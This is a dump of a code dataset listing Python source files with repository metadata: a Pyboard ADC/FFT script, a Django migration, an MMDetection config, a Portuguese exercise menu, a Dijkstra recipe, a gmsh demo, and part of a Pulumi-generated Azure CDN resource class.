Dataset schema (one record per source file):

| column | dtype | range / classes |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 1 to 1.03M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 3 to 239 |
| max_stars_repo_name | string | length 5 to 130 |
| max_stars_repo_head_hexsha | string | length 40 to 78 |
| max_stars_repo_licenses | sequence | length 1 to 10 |
| max_stars_count | int64 (nullable) | 1 to 191k |
| max_stars_repo_stars_event_min_datetime | string (nullable) | length 24 |
| max_stars_repo_stars_event_max_datetime | string (nullable) | length 24 |
| max_issues_repo_path | string | length 3 to 239 |
| max_issues_repo_name | string | length 5 to 130 |
| max_issues_repo_head_hexsha | string | length 40 to 78 |
| max_issues_repo_licenses | sequence | length 1 to 10 |
| max_issues_count | int64 (nullable) | 1 to 67k |
| max_issues_repo_issues_event_min_datetime | string (nullable) | length 24 |
| max_issues_repo_issues_event_max_datetime | string (nullable) | length 24 |
| max_forks_repo_path | string | length 3 to 239 |
| max_forks_repo_name | string | length 5 to 130 |
| max_forks_repo_head_hexsha | string | length 40 to 78 |
| max_forks_repo_licenses | sequence | length 1 to 10 |
| max_forks_count | int64 (nullable) | 1 to 105k |
| max_forks_repo_forks_event_min_datetime | string (nullable) | length 24 |
| max_forks_repo_forks_event_max_datetime | string (nullable) | length 24 |
| content | string | length 1 to 1.03M |
| avg_line_length | float64 | 1 to 958k |
| max_line_length | int64 | 1 to 1.03M |
| alphanum_fraction | float64 | 0 to 1 |
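The columns above describe one record per stored source file. As a minimal sketch of how rows with this schema could be inspected (an assumption, not part of the original dump: the dataset identifier below is a placeholder, and the Hugging Face `datasets` library is assumed to be installed), the snippet streams a few records and prints some of the metadata fields named above.

```python
# Minimal sketch (hypothetical dataset id): stream a few records and print
# the metadata columns listed in the schema above.
from datasets import load_dataset

rows = load_dataset("user/python-source-files", split="train", streaming=True)
for i, row in enumerate(rows):
    print(row["hexsha"], row["size"], row["max_stars_repo_path"], row["max_stars_count"])
    print(row["content"][:80])  # first characters of the stored source file
    if i == 2:  # stop after three records
        break
```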
hexsha: 4a27c6d7f9f3fe0e2a780d6baa10c63fc2939f15 | size: 1,191 | ext: py | lang: Python
repo_path: tests/pyboard/execScript_adc_son_fft.py | repo_name: david-therincourt/physique | repo_head_hexsha: add85faef564359252da93dca9b7dbb35bd6b4ab | licenses: ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
from physique import Pyboard
import numpy as np
import matplotlib.pyplot as plt
from numpy.fft import fft
script = """
from pyb import Pin, ADC, Timer, delay
import array
f = 20000 # sampling frequency
nb = 1000 # number of points
adc = ADC(Pin('A2')) # enable the ADC on pin A2
buf = array.array("h", [0]*nb) # h = signed short (2-byte integer)
tim = Timer(6, freq=f) # configure the timer that drives the ADC
adc.read_timed(buf, tim) # start the measurements
# Shape the data
f = tim.freq()
x = [i*1/f for i in range(nb)]
y = [val for val in buf]
# Send the data back
data = x, y # tuple of data
print(data) # print the tuple to the REPL
"""
feather = Pyboard("/dev/ttyACM0")
x, y = feather.exec_script_to_data(script)
t = np.array(x)
u = np.array(y)
rate = 20000
plt.subplot(2,1,1)
plt.plot(t,u,'r')
plt.grid()
#plt.ylim(0,4000)
plt.subplot(2,1,2)
spectre = np.absolute(fft(y))
#spectre = spectre/spectre.max()
n = spectre.size
freq = np.arange(n)*1.0/n*rate
plt.vlines(freq[1:-1],[0],spectre[1:-1],'r')
plt.xlabel('f (Hz)')
plt.ylabel('A')
#plt.axis([0,0.5*rate,0,1])
plt.show()
avg_line_length: 22.903846 | max_line_length: 83 | alphanum_fraction: 0.646516

hexsha: 4a27c712c4ba96ad083cf65f36aa1d94cc93aac7 | size: 276 | ext: py | lang: Python
repo_path: authors/apps/articles/migrations/0024_merge_20190130_0649.py | repo_name: andela/ah-django-unchained | repo_head_hexsha: a4e5f6cd11fdc0b9422020693ac1200b849cf0f3 | licenses: ["BSD-3-Clause"]
max_stars_count: null | max_issues_count: 26 (2019-01-07T14:22:05.000Z to 2019-02-28T17:11:48.000Z) | max_forks_count: 3 (2019-09-19T22:16:09.000Z to 2019-10-16T21:16:16.000Z)
content:
# Generated by Django 2.1.5 on 2019-01-30 06:49
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('articles', '0023_merge_20190129_0617'),
('articles', '0023_auto_20190129_1219'),
]
operations = [
]
avg_line_length: 18.4 | max_line_length: 49 | alphanum_fraction: 0.652174

hexsha: 4a27c81c1440b9420ebda80dd5cd4b348f790715 | size: 1,728 | ext: py | lang: Python
repo_path: configs/_base_/datasets/icdar2019_tracka_modern_instance.py | repo_name: vansin/tabnet | repo_head_hexsha: 2403c8134c23a704940522ace92a75b0fc6f5d99 | licenses: ["Apache-2.0"]
max_stars_count: 2 (2021-10-18T02:52:18.000Z to 2022-01-21T08:54:18.000Z) | max_issues_count: null | max_forks_count: null
content:
# dataset settings
dataset_type = 'TableDataset'
data_root = 'data/table/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True, with_mask=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels', 'gt_masks']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
samples_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file='data/icdar2019/modern_train.json',
img_prefix='data/icdar2019/training/TRACKA/ground_truth',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file='data/icdar2019/modern_test.json',
img_prefix='data/icdar2019/test/TRACKA/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file='data/icdar2019/modern_test.json',
img_prefix='data/icdar2019/test/TRACKA/',
pipeline=test_pipeline))
evaluation = dict(metric=['bbox', 'segm'])
avg_line_length: 34.56 | max_line_length: 77 | alphanum_fraction: 0.629051

hexsha: 4a27c8285f91dbb3a65facbb430585dda6274885 | size: 5,751 | ext: py | lang: Python
repo_path: Scripts/python/scripts mundo 1/Desafios/ALGUEM ME MATA.py | repo_name: BrenoNAlmeida/Scripts-Escola | repo_head_hexsha: 20d886d0401ef7f40a4a46e307eadbf5b1c0a5eb | licenses: ["Apache-2.0"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
nome = input('\033[34;1mOla, você esta na biblioteca python. Qual o seu nome ?\033[m')
print('\033[1;34mBem vindo ao primeiro mundo do curso de python {} !\033[m'.format(nome))
print('\033[34;1mAs fases desse curso são essas {}:\033[m\n'
'\033[1;33m1 = Seja um programador\n'
'2 = Para que serve o Python\n'
'3 = instalando o python3 e o IDLE\n'
'4 = primeiros comandos em python\n'
'5 = instalando o Pycharm e o Qpython\n'
'6 = Tipos primitivos e saida de dados\n'
'7 = Operadores Aritmeticos\n'
'8 = Utilizando modulos\n'
'9 = Manipulando texto\n'
'10 = Condições\033[m'.format(nome))
print('\033[35m=='*25)
print('\033[1;31m(obs : digite apenas o numero da fase desejada !!!)\033[m')
escolha=input('\033[34mDe que fase você deseja acessar os desafios {} ? \033[m'.format(nome))
print('\033[35m==\033[m'*26)
if escolha == '1':
print('\033[31;1mEssa fase NÃO tem nenhum desafio senhor {} !'.format(nome))
if escolha == '2':
print('\033[31;1mEssa fase NÃO tem nenhum desafio senhor {} !'.format(nome))
if escolha == '3':
print('\033[31;1mEssa fase NÃO tem nenhum desafio senhor {} !\033[m'.format(nome))
if escolha == '4':
print('\033[33;1mOs desafios dessa fase são esses {} :'
'\n 01 = Deixando tudo pronto'
'\n 02 = Respondendo ao usuario\033[m'.format(nome))
if escolha == '5':
print('\033[31;1mEssa fase NÃO tem nenhum desafio senhor {} !\033[m'.format(nome))
if escolha == '6':
print('\033[34mOs desafios dessa fase sao esses {} :'
'\n\033[33m 03 = Somando dois numeros'
'\n 04 = Analisando uma variavel\033[m'.format(nome))
if escolha == '7':
print('\033[34;1mOs desafios dessa fase são esses {} :'
'\n\033[33;1m 05 = Antecessor e sucessor de um numero'
'\n 06 = Dobro , triplo e Raiz quadrada de um numero'
'\n 07 = Media aritmetica'
'\n 08 = Conversor de medidas'
'\n 09 = Tabuada de um numero'
'\n 10 = Conversor de moedas'
'\n 11 = Pintando uma parede'
'\n 12 = Calculando desconto em 5%'
'\n 13 = Reajuste salarial'
'\n 14 = Conversor de temperaturas'
'\n 15 = Aluguel de carros\033[m'.format(nome))
if escolha == '8':
print('\033[1;34mOs desafios dessa fase são esses {} : !'
'\n\033[33;1m 16 = Quebrando um numero'
'\n 17 = calculando a hipotenuza'
'\n 18 = Seno ,cossene tangente'
'\n 19 = Sorteando um item da lista'
'\n 20 = Sorteando uma ordem na lista'
'\n 21 = Tocando um Mp3\033[m'.format(nome))
if escolha == '9':
print('\033[1;34mOs desafios dessa fase são esses {} : !'
'\n\033[33;1m 22 = Analizador de texto'
'\n 23 = Separando digitos de um numero'
'\n 24 = verificando as primeiras letras'
'\n 25 = procurando uma string dentro de uma variavel'
'\n 26 = primeira ocorrencia de uma string'
'\n 27 = primeiro e ultimo nome de uma pessoa\033[m'.format(nome))
if escolha == '10':
print('\033[1;34mOs desafios dessa fase são esses {} : !'
'\n 28 = jogo do adivinha'
'\n 29 = Radar eletronico'
'\n 30 = Par ou impar'
'\n 31 = custo da viagem'
'\n 32 = Ano bissexto'
'\n 33 = Maior e menor valor'
'\n 34 = Almento de salario'
'\n 35 = Analizando triangulo')
print('\033[35m=='*19)
so_arrumo_trabalho = input('\033[34mQual desafio você deseja executar {} ?\033[m'.format(nome))
print('\033[1;35m==\033[m'*19)
print('\033[34mO arquivo seráa executado em seguida !\033[m')
print('\033[1;35m==\033[m'*19)
if so_arrumo_trabalho == '01':
import Desafio001
if so_arrumo_trabalho == '02':
import Desafio002
if so_arrumo_trabalho == '03':
import Desafio003
if so_arrumo_trabalho == '04':
import Desafio004
if so_arrumo_trabalho == '05':
import Desafio005
if so_arrumo_trabalho == '06':
import Desafio006
if so_arrumo_trabalho == '07':
import Desafio007
if so_arrumo_trabalho == '08':
import Desafio008
if so_arrumo_trabalho == '09':
import Desafio009
if so_arrumo_trabalho == '10':
import Desafio010
if so_arrumo_trabalho == '11':
import Desafio011
if so_arrumo_trabalho == '12':
import Desafio013
if so_arrumo_trabalho == '13':
import Desafio013
if so_arrumo_trabalho == '14':
import Desafio014
if so_arrumo_trabalho == '15':
import Desafio015
if so_arrumo_trabalho == '16':
import Desafio016
if so_arrumo_trabalho == '17':
import Desafio017
if so_arrumo_trabalho == '18':
import Desafio018
if so_arrumo_trabalho == '19':
import Desafio019
if so_arrumo_trabalho == '20':
import Desafio020
if so_arrumo_trabalho == '21':
import Desafio021
if so_arrumo_trabalho == '22':
import Desafio022
if so_arrumo_trabalho == '23':
import Desafio023
if so_arrumo_trabalho == '24':
import Desafio024
if so_arrumo_trabalho == '25':
import Desafio025
if so_arrumo_trabalho == '26':
import Desafio027
if so_arrumo_trabalho == '27':
import Desafio027
if so_arrumo_trabalho == '28':
import Desafio028
if so_arrumo_trabalho == '29':
import Desafio029
if so_arrumo_trabalho == '30':
import Desafio030
if so_arrumo_trabalho == '31':
import Desafio031
if so_arrumo_trabalho == '32':
import Desafio032
if so_arrumo_trabalho == '33':
import Desafio033
if so_arrumo_trabalho == '34':
import Desafio034
if so_arrumo_trabalho == '35':
import Desafio035
print('===== fim da executação =====')
print('Obrigado por usar nossa bibliotaca {}'.format(nome))
print('espero que tenha gostado dos nossos serviços !')
avg_line_length: 38.34 | max_line_length: 95 | alphanum_fraction: 0.630499

hexsha: 4a27c82f8b117750422de2ef83f18859fbc93328 | size: 1,126 | ext: py | lang: Python
repo_path: cdtools/CPA/__init__.py | repo_name: jg-you/cascading_detection | repo_head_hexsha: a08f443f5f7bf46167277b2cb0571f5d94a341c6 | licenses: ["MIT"]
max_stars_count: 4 (2015-09-28T05:09:15.000Z to 2019-10-25T15:16:16.000Z) | max_issues_count: null | max_forks_count: null
content:
# -*- coding: utf-8 -*-
# cdtools -- a python library for cascading community detection on networks
# @author: Jean-Gabriel Young <[email protected]>
#
# cdtools/CPA/__init__.py -- Init script of the CPA submodule.
# Notes on CPA:
# The Clique Percolation Algorithm was introduced by G. Palla et al. in
#
# "Uncovering the overlapping community structure
# of complex networks in nature and society"
# Nature 435, 814–818 (2005)
#
# We use the official CPA implementation which requires a (free)
# license, which is *not* provided with cdtools, for obvious reasons.
# To use this module, one must request a license [1] and save it in
#
# [..]/cascading_detection/cdtools/CPA/license/
#
# Do not forget to configure the license in
#
# [..]/cascading_detection/cdtools/CPA/CPA_conf.yml
#
# Bugs and other inquiries regarding this algorithm in particular should be
# sent to the authors of CFinder as well.
#
# [1] Contact information:
# Email: [email protected]
# Website: http://CFinder.org
from .detection import Detect
__all__ = [Detect]
avg_line_length: 33.117647 | max_line_length: 61 | alphanum_fraction: 0.694494

hexsha: 4a27c9677bae0d915ff7f933fcdd1d84eab7b008 | size: 2,951 | ext: py | lang: Python
repo_path: recipes/Python/119466_Dijkstralgorithm_shortest/recipe-119466.py | licenses: ["MIT"]
max_stars_repo_name: tdiprima/code @ 61a74f5f93da087d27c70b2efe779ac6bd2a3b4f | max_issues_repo_name / max_forks_repo_name: unhacker/code @ 73b09edc1b9850c557a79296655f140ce5e853db
max_stars_count: 2,023 (2017-07-29T09:34:46.000Z to 2022-03-24T08:00:45.000Z) | max_issues_count: 32 (2017-09-02T17:20:08.000Z to 2022-02-11T17:49:37.000Z) | max_forks_count: 780 (2017-07-28T19:23:28.000Z to 2022-03-25T20:39:41.000Z)
content:
# Dijkstra's algorithm for shortest paths
# David Eppstein, UC Irvine, 4 April 2002
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/117228
from priodict import priorityDictionary
def Dijkstra(G,start,end=None):
"""
Find shortest paths from the start vertex to all
vertices nearer than or equal to the end.
The input graph G is assumed to have the following
representation: A vertex can be any object that can
be used as an index into a dictionary. G is a
dictionary, indexed by vertices. For any vertex v,
G[v] is itself a dictionary, indexed by the neighbors
of v. For any edge v->w, G[v][w] is the length of
the edge. This is related to the representation in
<http://www.python.org/doc/essays/graphs.html>
where Guido van Rossum suggests representing graphs
as dictionaries mapping vertices to lists of neighbors,
however dictionaries of edges have many advantages
over lists: they can store extra information (here,
the lengths), they support fast existence tests,
and they allow easy modification of the graph by edge
insertion and removal. Such modifications are not
needed here but are important in other graph algorithms.
Since dictionaries obey iterator protocol, a graph
represented as described here could be handed without
modification to an algorithm using Guido's representation.
Of course, G and G[v] need not be Python dict objects;
they can be any other object that obeys dict protocol,
for instance a wrapper in which vertices are URLs
and a call to G[v] loads the web page and finds its links.
The output is a pair (D,P) where D[v] is the distance
from start to v and P[v] is the predecessor of v along
the shortest path from s to v.
Dijkstra's algorithm is only guaranteed to work correctly
when all edge lengths are positive. This code does not
verify this property for all edges (only the edges seen
before the end vertex is reached), but will correctly
compute shortest paths even for some graphs with negative
edges, and will raise an exception if it discovers that
a negative edge has caused it to make a mistake.
"""
D = {} # dictionary of final distances
P = {} # dictionary of predecessors
Q = priorityDictionary() # est.dist. of non-final vert.
Q[start] = 0
for v in Q:
D[v] = Q[v]
if v == end: break
for w in G[v]:
vwLength = D[v] + G[v][w]
if w in D:
if vwLength < D[w]:
raise ValueError, \
"Dijkstra: found better path to already-final vertex"
elif w not in Q or vwLength < Q[w]:
Q[w] = vwLength
P[w] = v
return (D,P)
def shortestPath(G,start,end):
"""
Find a single shortest path from the given start vertex
to the given end vertex.
The input has the same conventions as Dijkstra().
The output is a list of the vertices in order along
the shortest path.
"""
D,P = Dijkstra(G,start,end)
Path = []
while 1:
Path.append(end)
if end == start: break
end = P[end]
Path.reverse()
return Path
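# Usage sketch (not from the original recipe): a tiny hypothetical graph in the
# dictionary-of-dictionaries format described in the Dijkstra() docstring above,
# used here only to exercise shortestPath().
if __name__ == "__main__":
    G = {'a': {'b': 1, 'c': 4}, 'b': {'c': 2, 'd': 5}, 'c': {'d': 1}, 'd': {}}
    print(shortestPath(G, 'a', 'd'))  # expected output: ['a', 'b', 'c', 'd']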
avg_line_length: 33.534091 | max_line_length: 64 | alphanum_fraction: 0.731278

hexsha: 4a27c99294943e26cc151bf61fc257cbb1f616a5 | size: 863 | ext: py | lang: Python
repo_path: onelab/share/doc/gmsh/demos/api/step_assembly.py | max_stars_repo_name: Christophe-Foyer/PyFEA | max_issues_repo_name / max_forks_repo_name: Christophe-Foyer/pyFEA | repo_head_hexsha: 344996d6b075ee4b2214283f0af8159d86d154fd | licenses: ["MIT"]
max_stars_count: 2 (2021-08-13T21:46:21.000Z to 2022-01-15T15:59:54.000Z) | max_issues_count: null | max_forks_count: 1 (2020-12-15T13:47:23.000Z to 2020-12-15T13:47:23.000Z)
content:
import gmsh
gmsh.initialize()
# load step file
gmsh.open('as1-tu-203.stp')
# get all model entities
ent = gmsh.model.getEntities()
physicals = {}
for e in ent:
n = gmsh.model.getEntityName(e[0], e[1])
# get entity labels read from STEP and create a physical group for all
# entities having the same 3rd label in the /-separated label path
if n:
print('Entity ' + str(e) + ' has label ' + n + ' (and mass ' +
str(gmsh.model.occ.getMass(e[0], e[1])) + ')')
path = n.split('/')
if e[0] == 3 and len(path) > 3:
if(path[2] not in physicals):
physicals[path[2]] = []
physicals[path[2]].append(e[1])
# create the physical groups
for name, tags in physicals.items():
p = gmsh.model.addPhysicalGroup(3, tags)
gmsh.model.setPhysicalName(3, p, name)
gmsh.fltk.run()
avg_line_length: 27.83871 | max_line_length: 74 | alphanum_fraction: 0.596756

hexsha: 4a27c9b8b66eea7bd199ce3ffb1963eb2f53926b | size: 18,882 | ext: py | lang: Python
repo_path: sdk/python/pulumi_azure_native/cdn/v20190615/endpoint.py | repo_name: pulumi-bot/pulumi-azure-native | repo_head_hexsha: f7b9490b5211544318e455e5cceafe47b628e12c | licenses: ["Apache-2.0"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['Endpoint']
class Endpoint(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
content_types_to_compress: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
delivery_policy: Optional[pulumi.Input[pulumi.InputType['EndpointPropertiesUpdateParametersDeliveryPolicyArgs']]] = None,
endpoint_name: Optional[pulumi.Input[str]] = None,
geo_filters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GeoFilterArgs']]]]] = None,
is_compression_enabled: Optional[pulumi.Input[bool]] = None,
is_http_allowed: Optional[pulumi.Input[bool]] = None,
is_https_allowed: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
optimization_type: Optional[pulumi.Input[Union[str, 'OptimizationType']]] = None,
origin_host_header: Optional[pulumi.Input[str]] = None,
origin_path: Optional[pulumi.Input[str]] = None,
origins: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DeepCreatedOriginArgs']]]]] = None,
probe_path: Optional[pulumi.Input[str]] = None,
profile_name: Optional[pulumi.Input[str]] = None,
query_string_caching_behavior: Optional[pulumi.Input['QueryStringCachingBehavior']] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
web_application_firewall_policy_link: Optional[pulumi.Input[pulumi.InputType['EndpointPropertiesUpdateParametersWebApplicationFirewallPolicyLinkArgs']]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
CDN endpoint is the entity within a CDN profile containing configuration information such as origin, protocol, content caching and delivery behavior. The CDN endpoint uses the URL format <endpointname>.azureedge.net.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] content_types_to_compress: List of content types on which compression applies. The value should be a valid MIME type.
:param pulumi.Input[pulumi.InputType['EndpointPropertiesUpdateParametersDeliveryPolicyArgs']] delivery_policy: A policy that specifies the delivery rules to be used for an endpoint.
:param pulumi.Input[str] endpoint_name: Name of the endpoint under the profile which is unique globally.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GeoFilterArgs']]]] geo_filters: List of rules defining the user's geo access within a CDN endpoint. Each geo filter defines an access rule to a specified path or content, e.g. block APAC for path /pictures/
:param pulumi.Input[bool] is_compression_enabled: Indicates whether content compression is enabled on CDN. Default value is false. If compression is enabled, content will be served as compressed if user requests for a compressed version. Content won't be compressed on CDN when requested content is smaller than 1 byte or larger than 1 MB.
:param pulumi.Input[bool] is_http_allowed: Indicates whether HTTP traffic is allowed on the endpoint. Default value is true. At least one protocol (HTTP or HTTPS) must be allowed.
:param pulumi.Input[bool] is_https_allowed: Indicates whether HTTPS traffic is allowed on the endpoint. Default value is true. At least one protocol (HTTP or HTTPS) must be allowed.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[Union[str, 'OptimizationType']] optimization_type: Specifies what scenario the customer wants this CDN endpoint to optimize for, e.g. Download, Media services. With this information, CDN can apply scenario driven optimization.
:param pulumi.Input[str] origin_host_header: The host header value sent to the origin with each request. If you leave this blank, the request hostname determines this value. Azure CDN origins, such as Web Apps, Blob Storage, and Cloud Services require this host header value to match the origin hostname by default.
:param pulumi.Input[str] origin_path: A directory path on the origin that CDN can use to retrieve content from, e.g. contoso.cloudapp.net/originpath.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DeepCreatedOriginArgs']]]] origins: The source of the content being delivered via CDN.
:param pulumi.Input[str] probe_path: Path to a file hosted on the origin which helps accelerate delivery of the dynamic content and calculate the most optimal routes for the CDN. This is relative to the origin path.
:param pulumi.Input[str] profile_name: Name of the CDN profile which is unique within the resource group.
:param pulumi.Input['QueryStringCachingBehavior'] query_string_caching_behavior: Defines how CDN caches requests that include query strings. You can ignore any query strings when caching, bypass caching to prevent requests that contain query strings from being cached, or cache every request with a unique URL.
:param pulumi.Input[str] resource_group_name: Name of the Resource group within the Azure subscription.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[pulumi.InputType['EndpointPropertiesUpdateParametersWebApplicationFirewallPolicyLinkArgs']] web_application_firewall_policy_link: Defines the Web Application Firewall policy for the endpoint (if applicable)
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['content_types_to_compress'] = content_types_to_compress
__props__['delivery_policy'] = delivery_policy
__props__['endpoint_name'] = endpoint_name
__props__['geo_filters'] = geo_filters
__props__['is_compression_enabled'] = is_compression_enabled
__props__['is_http_allowed'] = is_http_allowed
__props__['is_https_allowed'] = is_https_allowed
__props__['location'] = location
__props__['optimization_type'] = optimization_type
__props__['origin_host_header'] = origin_host_header
__props__['origin_path'] = origin_path
if origins is None and not opts.urn:
raise TypeError("Missing required property 'origins'")
__props__['origins'] = origins
__props__['probe_path'] = probe_path
if profile_name is None and not opts.urn:
raise TypeError("Missing required property 'profile_name'")
__props__['profile_name'] = profile_name
__props__['query_string_caching_behavior'] = query_string_caching_behavior
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['tags'] = tags
__props__['web_application_firewall_policy_link'] = web_application_firewall_policy_link
__props__['host_name'] = None
__props__['name'] = None
__props__['provisioning_state'] = None
__props__['resource_state'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:cdn/v20190615:Endpoint"), pulumi.Alias(type_="azure-native:cdn:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn:Endpoint"), pulumi.Alias(type_="azure-native:cdn/latest:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/latest:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20150601:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20150601:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20160402:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20160402:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20161002:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20161002:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20170402:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20170402:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20171012:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20171012:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20190415:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20190415:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20190615preview:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20190615preview:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20191231:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20191231:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20200331:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20200331:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20200415:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20200415:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20200901:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20200901:Endpoint")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Endpoint, __self__).__init__(
'azure-native:cdn/v20190615:Endpoint',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Endpoint':
"""
Get an existing Endpoint resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["content_types_to_compress"] = None
__props__["delivery_policy"] = None
__props__["geo_filters"] = None
__props__["host_name"] = None
__props__["is_compression_enabled"] = None
__props__["is_http_allowed"] = None
__props__["is_https_allowed"] = None
__props__["location"] = None
__props__["name"] = None
__props__["optimization_type"] = None
__props__["origin_host_header"] = None
__props__["origin_path"] = None
__props__["origins"] = None
__props__["probe_path"] = None
__props__["provisioning_state"] = None
__props__["query_string_caching_behavior"] = None
__props__["resource_state"] = None
__props__["tags"] = None
__props__["type"] = None
__props__["web_application_firewall_policy_link"] = None
return Endpoint(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="contentTypesToCompress")
def content_types_to_compress(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of content types on which compression applies. The value should be a valid MIME type.
"""
return pulumi.get(self, "content_types_to_compress")
@property
@pulumi.getter(name="deliveryPolicy")
def delivery_policy(self) -> pulumi.Output[Optional['outputs.EndpointPropertiesUpdateParametersResponseDeliveryPolicy']]:
"""
A policy that specifies the delivery rules to be used for an endpoint.
"""
return pulumi.get(self, "delivery_policy")
@property
@pulumi.getter(name="geoFilters")
def geo_filters(self) -> pulumi.Output[Optional[Sequence['outputs.GeoFilterResponse']]]:
"""
List of rules defining the user's geo access within a CDN endpoint. Each geo filter defines an access rule to a specified path or content, e.g. block APAC for path /pictures/
"""
return pulumi.get(self, "geo_filters")
@property
@pulumi.getter(name="hostName")
def host_name(self) -> pulumi.Output[str]:
"""
The host name of the endpoint structured as {endpointName}.{DNSZone}, e.g. contoso.azureedge.net
"""
return pulumi.get(self, "host_name")
@property
@pulumi.getter(name="isCompressionEnabled")
def is_compression_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Indicates whether content compression is enabled on CDN. Default value is false. If compression is enabled, content will be served as compressed if user requests for a compressed version. Content won't be compressed on CDN when requested content is smaller than 1 byte or larger than 1 MB.
"""
return pulumi.get(self, "is_compression_enabled")
@property
@pulumi.getter(name="isHttpAllowed")
def is_http_allowed(self) -> pulumi.Output[Optional[bool]]:
"""
Indicates whether HTTP traffic is allowed on the endpoint. Default value is true. At least one protocol (HTTP or HTTPS) must be allowed.
"""
return pulumi.get(self, "is_http_allowed")
@property
@pulumi.getter(name="isHttpsAllowed")
def is_https_allowed(self) -> pulumi.Output[Optional[bool]]:
"""
Indicates whether HTTPS traffic is allowed on the endpoint. Default value is true. At least one protocol (HTTP or HTTPS) must be allowed.
"""
return pulumi.get(self, "is_https_allowed")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location.
"""
return pulumi.get(self, "location")
